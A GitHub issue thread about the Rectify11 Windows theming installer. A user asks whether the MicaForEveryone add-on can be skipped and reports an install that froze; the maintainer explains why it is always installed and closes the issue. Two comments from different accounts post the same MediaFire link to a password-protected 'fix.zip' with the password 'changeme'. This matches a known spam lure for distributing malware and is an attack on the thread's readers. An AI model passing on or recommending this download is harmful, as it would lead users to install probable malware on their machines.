### ISSUE TITLE
Is MFE installation mandatory?

### ISSUE THREAD

**Issue by MuscularPuky** [Rectify11/Installer#608]
### Description

I;m not sure the "mandatory" is appropriate in this case anyways is there no option to reject the install MFE? I already have UWP MFE, even ExplorerFrame too and my MFE configs have more than of that so totally do not need to install another win32 MFE. When MFE launched first at startup (because MFE startup task already exsists so conflicted) I shocked at the moment as thought the configs lost but I relieved after noticed that's another instance. I checked 2 check boxes, "do not install MFE" and "use Mica Alt instead of Mica" as I remeber distinctly—because it's impressive for me that there's "do not" and "do" option together

+Can I use high contrast theme after patch? does that break Secure UX Patch?

### Steps To Reproduce

1. Launched the installer (v3.1 already installed)
2. Pressed "Update"
3. Disabled Windows Defender (the path is already excluded)
4. Checked "Theme" only
5. Selected "Mica Theme" in dropdown
6. Checked 2 check boxes, "do not install MFE" and "use Mica Alt instaed of Mica"
7. Theme applied
8. Restart now/later required but the installer froze
9. I manually restart from the start menu
10. MFE launched automatically
11. and Secure UX not patched
12. I launched the installer again
13. Pressed "Uninstall"
14. But the installer said "Windows Update is running"
15. I restarted again
16. LogonUI froze few seconds then suddenly UX is patched
17. MFE launched automatically

### Rectify11 Version

3.2.70.1+c57eb635250343e507af6c95c853d194223fc44b

### Windows Version

Windows vNext, NT 10.0.27686.1000

### Logs

Unfortunately there's no speciall og

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MishaProductions** [comment]
MFE is always installed if a mica theme is selected. I removed the "install micaforeveryone" options so that the control panel applet works properly.

**Comment by MishaProductions** [comment]
MFE will most likely not be used in V4+, and v3 code will no longer be updated, so I am closing this issue.
